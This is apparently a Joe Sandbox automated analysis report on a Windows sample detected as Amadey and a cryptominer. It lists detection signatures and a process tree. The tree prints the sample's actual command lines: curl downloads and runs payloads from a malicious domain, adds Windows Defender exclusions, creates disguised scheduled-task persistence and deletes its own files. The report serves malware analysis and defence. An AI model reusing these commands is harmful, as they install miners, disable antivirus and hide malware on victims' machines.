Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1520638
MD5:dc730eea0eba910485703a74d173f8e2
SHA1:093f63548d7366b6c3cbfc3ddfca453199e40eca
SHA256:18894a1a879e0e75c33ec7988c8835b20b42a3fae8c51f1cb4f026f2b855a6b7
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, BitCoin Miner, SilentXMRMiner
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected BitCoin Miner
Yara detected SilentXMRMiner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Found strings related to Crypto-Mining
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Sample is not signed and drops a device driver
Sigma detected: Curl Download And Execute Combination
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DC730EEA0EBA910485703A74D173F8E2)
    • axplong.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: DC730EEA0EBA910485703A74D173F8E2)
  • axplong.exe (PID: 7728 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: DC730EEA0EBA910485703A74D173F8E2)
  • axplong.exe (PID: 2304 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: DC730EEA0EBA910485703A74D173F8E2)
    • loader_5879465914.exe (PID: 1748 cmdline: "C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe" MD5: 7DF3608AE8EA69762C71DA1C05F0C043)
      • cmd.exe (PID: 4408 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 7276 cmdline: curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • cscript.exe (PID: 7692 cmdline: cscript conf.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
          • schtasks.exe (PID: 7580 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7952 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7832 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7900 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4632 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5744 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2228 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8180 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6428 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6988 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 888 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5752 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3104 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5812 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4812 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6616 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7096 cmdline: "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe && start miner2.0.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 6580 cmdline: curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • miner2.0.exe (PID: 5868 cmdline: miner2.0.exe MD5: 651396CF297F15A1F92EE0A29E27C4EA)
          • cmd.exe (PID: 8080 cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 4496 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 7968 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 8116 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 3104 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 2756 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • svchost64.exe (PID: 5992 cmdline: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe" MD5: A8638A5105C9A663B0D6918D64B3AD21)
              • cmd.exe (PID: 7224 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 7232 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • services64.exe (PID: 6976 cmdline: "C:\Windows\system32\services64.exe" MD5: 651396CF297F15A1F92EE0A29E27C4EA)
                • cmd.exe (PID: 3900 cmdline: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 3736 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user' MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 280 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming' MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 2600 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • powershell.exe (PID: 8016 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows' MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 6364 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • svchost64.exe (PID: 6772 cmdline: C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe" MD5: A8638A5105C9A663B0D6918D64B3AD21)
                    • cmd.exe (PID: 6940 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • schtasks.exe (PID: 6740 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                    • sihost64.exe (PID: 7008 cmdline: "C:\Windows\system32\Microsoft\Libs\sihost64.exe" MD5: 7112FD4E6B2CDD13C11B8B04A96769CB)
                    • cmd.exe (PID: 4476 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • choice.exe (PID: 7812 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
              • cmd.exe (PID: 4116 cmdline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • choice.exe (PID: 4280 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
      • cmd.exe (PID: 7604 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7724 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7728 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5904 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6620 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3732 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 796 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1908 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6592 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7804 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6032 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4940 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1436 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3284 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1464 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4112 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2696 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 5728 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6352 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1640 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1368 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2436 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1716 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3636 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Microsoft-Edge.exe (PID: 7636 cmdline: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe MD5: 7DF3608AE8EA69762C71DA1C05F0C043)
    • cmd.exe (PID: 7772 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7880 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3872 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6064 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1984 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2504 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1988 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3760 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2696 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1740 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5676 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6184 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6568 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6288 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6700 cmdline: "C:\Windows\System32\cmd.exe" /c MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
